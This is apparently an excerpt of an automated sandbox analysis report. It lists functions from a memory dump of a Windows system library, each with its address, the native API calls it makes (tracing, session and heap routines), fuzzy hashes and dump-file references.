String ID:
API String ID: 1925790395-0
Opcode ID: 34b90fa4c9fbb491d964a667f7b646b0ec0eedb6bdbe1b88f462560f52bd2403
Instruction ID: e609864d308a3888d0d2980e0a29cc3c59a2fa1b5763f50b41c053e9e06036bf
Opcode Fuzzy Hash: 34b90fa4c9fbb491d964a667f7b646b0ec0eedb6bdbe1b88f462560f52bd2403
Instruction Fuzzy Hash: 4E11CE72A00A44AFD712CF29D950B5773E8EF06348F024469E9A9CB211DF31EC20ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF2E14, Relevance: 3.1, APIs: 2, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(00000000,?,?), ref: 6ABF2E5E
ZwTraceEvent.1105(?,00020402,00000020,?), ref: 6ABF2E8E

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 688f218c3653efe2cf79ca386d62717e8cc6d572a24809934b61e0851fa21b77
Instruction ID: ef55368ff45272c57953d8423bf2498bfca8e4d62f6d6dbb6bde054d1ff96d30
Opcode Fuzzy Hash: 688f218c3653efe2cf79ca386d62717e8cc6d572a24809934b61e0851fa21b77
Instruction Fuzzy Hash: 1E1118B1E01259ABCB00DFA9C545AAEBBF8FF48310F10406AF914E7351DA74AA11DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6AB695F0, Relevance: 3.0, APIs: 2, Instructions: 47nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationWorkerFactory.1105(?,00000004,00000000,00000004,00000000,?,?,6AB8F9CB,00000000,00000001,00000000,00000001,?,00000000,00000000), ref: 6AB69621
RtlGetCurrentServiceSessionId.1105(?,00000004,00000000,00000004,00000000,?,?,6AB8F9CB,00000000,00000001,00000000,00000001,?,00000000,00000000), ref: 6AB69628

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFactoryInformationServiceSessionWorker
String ID:
API String ID: 2490488586-0
Opcode ID: b99ca973338ded875cf695b9a21ffe936fa816212ff8a6ca1792bfe0ad1d1fa1
Instruction ID: 046bbca4f1992d789b55612fcb7e8ea3677049bbda3f79079d032be80b14f75f
Opcode Fuzzy Hash: b99ca973338ded875cf695b9a21ffe936fa816212ff8a6ca1792bfe0ad1d1fa1
Instruction Fuzzy Hash: CD012473A057C0EBD7108B58C804F1973A5DB81F28F11911AED248B291EF34E900A791

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38966, Relevance: 3.0, APIs: 2, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(00000000,?), ref: 6AC389A2
ZwTraceEvent.1105(?,00000403,00000018,?,00000000,?), ref: 6AC389CF

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 66ec77f12cb068f524bda3ac796ffc64dea369304ce7aba5273a83c2b5d9b854
Instruction ID: 51ade0525ee142dd243874b41b0dc045c29c594db7ffe6e604d76a8876175cb7
Opcode Fuzzy Hash: 66ec77f12cb068f524bda3ac796ffc64dea369304ce7aba5273a83c2b5d9b854
Instruction Fuzzy Hash: 260129B1A0125DABCB00CFA9D9459AEB7F8FF48304F11445AF915E7341EB749A00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38ADD, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,?,6ABC1B21,?), ref: 6AC38B13
ZwTraceEvent.1105(?,00000403,00000014,?,?,?,7FFE0386), ref: 6AC38B40

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 8391533ea65545de5aa38ca95bc6024d2b8aa9c1c70e776720d934b7407e37f4
Instruction ID: 4706ac455dbe3d990e549ed039ed7f3cc8b3c25f849914bc7409500a9420c249
Opcode Fuzzy Hash: 8391533ea65545de5aa38ca95bc6024d2b8aa9c1c70e776720d934b7407e37f4
Instruction Fuzzy Hash: 5D015EB1A0125DABCB00CFA9D9459AEB7B8FF48314F10005AF904E7341DB349A00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38A62, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,?,?,6ABD971E,?,?,?), ref: 6AC38A98
ZwTraceEvent.1105(?,00020402,00000014,?,?,?,?), ref: 6AC38AC5

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 55f0ae54b34e93792431488bc59664399802f97f03ef16ed3fbd953e5921869f
Instruction ID: cf8f71cea04f474d3465ab894fbea25cfc7316ddf0e02fa79f5cb5aba8bee0ad
Opcode Fuzzy Hash: 55f0ae54b34e93792431488bc59664399802f97f03ef16ed3fbd953e5921869f
Instruction Fuzzy Hash: 00011AB1A0125CAFCB04DFA9D9459AEB7B8EF49714F11405AFA14F7341EB34A910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AC389E7, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,?,6ABC1AC9,?), ref: 6AC38A1D
ZwTraceEvent.1105(?,00000403,00000014,?,?,?,7FFE0386), ref: 6AC38A4A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: d5410dc985514b01460a54dd0c3c811851c7c835d1f64f5bb17149c4abcfbade
Instruction ID: cdbdeae65bdc5301839385831451b84daecfc6ec6ecba3efdf089d4806a45c17
Opcode Fuzzy Hash: d5410dc985514b01460a54dd0c3c811851c7c835d1f64f5bb17149c4abcfbade
Instruction Fuzzy Hash: F3011EB1A0125CAFDB00DFA9D9459AEB7F8EF49314F11405AFA14F7341EB749A01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38ED6, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,?,?,6ABD3B1B,?,?,?), ref: 6AC38F2A
ZwTraceEvent.1105(?,00020402,0000001C,?), ref: 6AC38F57

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 5d78fd5ab64f257318250b44d702bdf49a74755f32d31f4decaabf36b8b67bce
Instruction ID: 336bb3e83c27348e8b86fc8a41246e47638026bc12a4367438595ba5a7a0c2bf
Opcode Fuzzy Hash: 5d78fd5ab64f257318250b44d702bdf49a74755f32d31f4decaabf36b8b67bce
Instruction Fuzzy Hash: 1B111E70A052599FDB04DFA9C545BAEF7F4FF08304F0442AAE518EB382EB349940DB94

Uniqueness

Uniqueness Score: -1.00%

Function 6AC39CB3, Relevance: 3.0, APIs: 2, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,7FFE0386,?,?,?,?,?,?,?,?,?,?,6ABC1AF4,?,?), ref: 6AC39CE9
ZwTraceEvent.1105(?,00000402,00000014,?,?,?,7FFE0386), ref: 6AC39D16

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: c23d7a53438f31d57285bd457792a667f53a0e7711298ef1bfa1c2278fe6ab89
Instruction ID: 802b25b09e8fc3dd26e737f0fe3c6e589cea62ac1bfa8949fe1fee29457cfc24
Opcode Fuzzy Hash: c23d7a53438f31d57285bd457792a667f53a0e7711298ef1bfa1c2278fe6ab89
Instruction Fuzzy Hash: 10011EB1A0125CABDB00DFA9D9459EEBBB8FF49314F11405AF914EB341DB74A900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6AB67055, Relevance: 3.0, APIs: 2, Instructions: 43memorytimeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.1105(00000001,?,6AC3FE98,?,00000000,00000000,7FFFFFFF,?,?,?,?,6ABF430E,?,6AC408D0,00000008,6AB99B80), ref: 6AB67086
RtlFreeHeap.1105(?,00000000,00000002,7FFFFFFF,?,?,?,?,6ABF430E,?,6AC408D0,00000008,6AB99B80,?,?), ref: 6AB670AB

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: DebugFreeHeapPrintTimes
String ID:
API String ID: 3752032992-0
Opcode ID: f36e588b02f3353891395afd0d4d64cc1996ec3a1b4c82fa549d7aa6329e49b7
Instruction ID: 76e13b68c8a4112d65267e893a8a03b8cc7fdcdc050796bf7dbb12f4be5c5606
Opcode Fuzzy Hash: f36e588b02f3353891395afd0d4d64cc1996ec3a1b4c82fa549d7aa6329e49b7
Instruction Fuzzy Hash: CF01DF31201648ABC721CF58CD09FABBBF9EB44710F11015DF80593141CBB1A900C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 6AC39BBE, Relevance: 3.0, APIs: 2, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?), ref: 6AC39BF4
ZwTraceEvent.1105(?,00000403,00000014,?,?,?), ref: 6AC39C21

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 798760f4b0cb49360790802d239b2e18644599629fff248edbc0e6f88f4d3859
Instruction ID: 56f947c259cdfb321c808467d1b6712eacac2c8d52b671535b7b1b7861e33883
Opcode Fuzzy Hash: 798760f4b0cb49360790802d239b2e18644599629fff248edbc0e6f88f4d3859
Instruction Fuzzy Hash: 3F017C71A01658ABCB00DFA9D855AAEB7F8FF48310F11005AF914AB380EB34AA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6B1E1, Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(6AC57B80,?,?,6ABD3BA6,00000000,?,6AB8DFDF,?), ref: 6AB6B1EC
RtlGetCurrentServiceSessionId.1105 ref: 6ABC4A34

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentServiceSession
String ID:
API String ID: 1007659313-0
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: e149dc3dc9fde6eda0bbbbc72331d6ef54857f1e9903052eea6dcfbe1fc082e0
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: F501F9322815C0EBD322875DC808F497BE8EF42754F060061F9248B6B3EF74C980E315

Uniqueness

Uniqueness Score: -1.00%

Function 6AB95AA0, Relevance: 3.0, APIs: 2, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

ZwSetInformationWorkerFactory.1105(?,00000005,00000000,00000004,00000000,?,?,6AC380F8,00000000,00000000,6AC586C4,6AC586C4,00000008,?,00000000,00000008), ref: 6AB95AD1
RtlGetCurrentServiceSessionId.1105(?,00000005,00000000,00000004,00000000,?,?,6AC380F8,00000000,00000000,6AC586C4,6AC586C4,00000008,?,00000000,00000008), ref: 6AB95AD6

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentFactoryInformationServiceSessionWorker
String ID:
API String ID: 2490488586-0
Opcode ID: c9b001a91482740e9157406d5ad749f8f827d34b66fe1a1f9de7b8e59cb761b8
Instruction ID: ef74e9d52303a0182c4478d1b1a273370f88a4f3cb90fa2a13d674b936c6afd9
Opcode Fuzzy Hash: c9b001a91482740e9157406d5ad749f8f827d34b66fe1a1f9de7b8e59cb761b8
Instruction Fuzzy Hash: A40126315855C4AFD3108B18CC88F893BA8EB02725F114361FC248B291EFB0D984A799

Uniqueness

Uniqueness Score: -1.00%

Function 6AC2131B, Relevance: 3.0, APIs: 2, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6ABCE38A,00000000), ref: 6AC21348
ZwTraceEvent.1105(?,00020402,00000010,?), ref: 6AC21375

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: cbfb92f4f3f539a641f26e22c9cc0a6499f1fbf4d32ab9aab54bce4ef59244e8
Instruction ID: fab69b76dcafe60d940256f2df9cb619676b6010276d9c5658da2a3aa322a9ef
Opcode Fuzzy Hash: cbfb92f4f3f539a641f26e22c9cc0a6499f1fbf4d32ab9aab54bce4ef59244e8
Instruction Fuzzy Hash: 7D016D70A01248AFCB04DFADC505A9EB7F4FF08300F004059F914EB341EA309A00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6ABF2EA3, Relevance: 3.0, APIs: 2, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105 ref: 6ABF2ED5
ZwTraceEvent.1105(?,00020402,0000000C), ref: 6ABF2F02

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 3da909e0b7f47639b21155aee55fce63f15db8f5e0707c96f560262d83005108
Instruction ID: b3c88c9368e7b316b576efcfb9dd6a2f4b72fc0c1ec8a59f358cad4c4579890e
Opcode Fuzzy Hash: 3da909e0b7f47639b21155aee55fce63f15db8f5e0707c96f560262d83005108
Instruction Fuzzy Hash: AEF0FF702097849FC310EF28C806A1BB7E4FF88314F004A5AF8A8DB385EA34E900D782

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38F6A, Relevance: 3.0, APIs: 2, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,?,6ABD2CE2,?,?,00000000,?,00002710,00000000,?,?,?), ref: 6AC38F97
ZwTraceEvent.1105(?,00000402,00000010,?,?,?,?,?,6ABD2CE2,?,?,00000000,?,00002710,00000000,?), ref: 6AC38FC4

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: ac32495c71c45e008e9aaa8fc718c90e20222c365be07faa9f8fe21cbc7e358d
Instruction ID: 4e7d8ca046fd0448a4ec42514c6b5c74f4e7f5834d868c872ec0c9f18c6cb36d
Opcode Fuzzy Hash: ac32495c71c45e008e9aaa8fc718c90e20222c365be07faa9f8fe21cbc7e358d
Instruction Fuzzy Hash: 70013C74A0525CAFDB04DFA8D545AAEB7F4EF08704F11405AF914EB381EB74DA10DB94

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA927A, Relevance: 3.0, APIs: 2, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.1105(?,00000008,00000098,?,?,00000000,6AB9504F,00000000,?,?,6AB94E1B,0000000F,?,000000A0), ref: 6ABA9290
memset.1105(00000000,00000000,00000098,?,00000008,00000098,?,?,00000000,6AB9504F,00000000,?,?,6AB94E1B,0000000F,?), ref: 6ABA929F

Part of subcall function 6ABA92C6: RtlAcquireSRWLockExclusive.1105(6AC586AC,0000000C,?,00000000,00000000,?,6ABA92C0,00000000,?,?,6AB94E1B,0000000F,?,000000A0), ref: 6ABA92D6
Part of subcall function 6ABA92C6: RtlRbInsertNodeEx.1105(6AC586D4,?,00000000,00000000,6AC586AC,0000000C,?,00000000,00000000), ref: 6ABA9301
Part of subcall function 6ABA92C6: RtlReleaseSRWLockExclusive.1105(6AC586AC,6AC586D4,?,00000000,00000000,6AC586AC,0000000C,?,00000000,00000000), ref: 6ABA930B

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$AcquireAllocateHeapInsertNodeReleasememset
String ID:
API String ID: 3899015646-0
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 3babd4edf2649565fc2173ce34f576127fcfd61f4898d6a09eeeadf71b5fc0a1
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 5EE065723416806BE7118E59DC84B57766DDF82725F014079F6055E243CBF6D90997A0

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38C75, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105 ref: 6AC38C96
ZwTraceEvent.1105(?,00020402,00000008,?), ref: 6AC38CC3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 929e416a78ac8e706575dbb5c74b04f7b7c31fd13591544b7a71b3fb28566542
Instruction ID: b178a73f45050daa1ed6a9ed28d1c73e269646e0ee4db1a5a487921acc7ace9d
Opcode Fuzzy Hash: 929e416a78ac8e706575dbb5c74b04f7b7c31fd13591544b7a71b3fb28566542
Instruction Fuzzy Hash: 9BF09A70A15698ABDB04EFA8E905E6EB3B4EF04304F014099F914EB282EF38D900DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38C14, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105 ref: 6AC38C35
ZwTraceEvent.1105(?,00020402,00000008,?), ref: 6AC38C62

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: 7ba47e89df984ad73bf4396bb3961011d750649490beff97ce754f247dfaf824
Instruction ID: 356a25653a65b5c6387eae79caa5d0b65f75381232021a9d2765f0b36b0e0ed7
Opcode Fuzzy Hash: 7ba47e89df984ad73bf4396bb3961011d750649490beff97ce754f247dfaf824
Instruction Fuzzy Hash: FCF09A70A05658ABDB04DFA9E905E6EB7B4FB04304F014499F914EB282EE34D900DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38D34, Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,6ABD2D82,?,?,?,00000000,?,00000000,?), ref: 6AC38D55
ZwTraceEvent.1105(?,00020402,00000008,?,?,?,?,?,?,?,?,?,6ABD2D82,?,?,?), ref: 6AC38D82

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: a960240a1792f4ce842ab5db9e40f2007a3cf31521df5b38d6e3d68fd8a45f92
Instruction ID: 56c7eeb63886f7be764806dd02ddeec941378fedc8946a58356da4d5b1778ba9
Opcode Fuzzy Hash: a960240a1792f4ce842ab5db9e40f2007a3cf31521df5b38d6e3d68fd8a45f92
Instruction Fuzzy Hash: 55F09A70A05658AFDB04DFA8D545A6EB7F4EB08304F518099F915EB282EE34D900DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6AC21BA8, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105(?,?,?,?,?,?,?,?,?,?,6AC22783,00000001), ref: 6AC21BC6
ZwTraceEvent.1105(?,00000402,00000004,?,?,?,?,?,?,?,?,?,?,?,6AC22783,00000001), ref: 6AC21BF3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: f64ed7152b3698781bee7a5b5aed840083c8b2dbb7b1cfdf3a3f79a65b5637e6
Instruction ID: d22103aaf5d3e38f3d3de33dbf38aa5448be8e8d3f961b36657940a34a4d76c7
Opcode Fuzzy Hash: f64ed7152b3698781bee7a5b5aed840083c8b2dbb7b1cfdf3a3f79a65b5637e6
Instruction Fuzzy Hash: 6BF082B5A0528CABDB04DBADC54AA9E77B4EF09304F410099F605EB281EE75DD40D754

Uniqueness

Uniqueness Score: -1.00%

Function 6AC38BB6, Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

RtlGetCurrentServiceSessionId.1105 ref: 6AC38BD4
ZwTraceEvent.1105(?,00020402,00000004,?), ref: 6AC38C01

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentEventServiceSessionTrace
String ID:
API String ID: 171358211-0
Opcode ID: ea93858d273b2a53b4ed718d356957b0ad0bab46d2dee037aefaf2a7c78afd20
Instruction ID: fc2a133e687cfc8a59619c25f1fa0068a6368b374b16a8e31ad83be86fba83c8
Opcode Fuzzy Hash: ea93858d273b2a53b4ed718d356957b0ad0bab46d2dee037aefaf2a7c78afd20
Instruction Fuzzy Hash: 72F05EB0A052A9ABDB04DFACD905E6EB3B4EB04308F010099FA15EB282EE74D900D758

Uniqueness

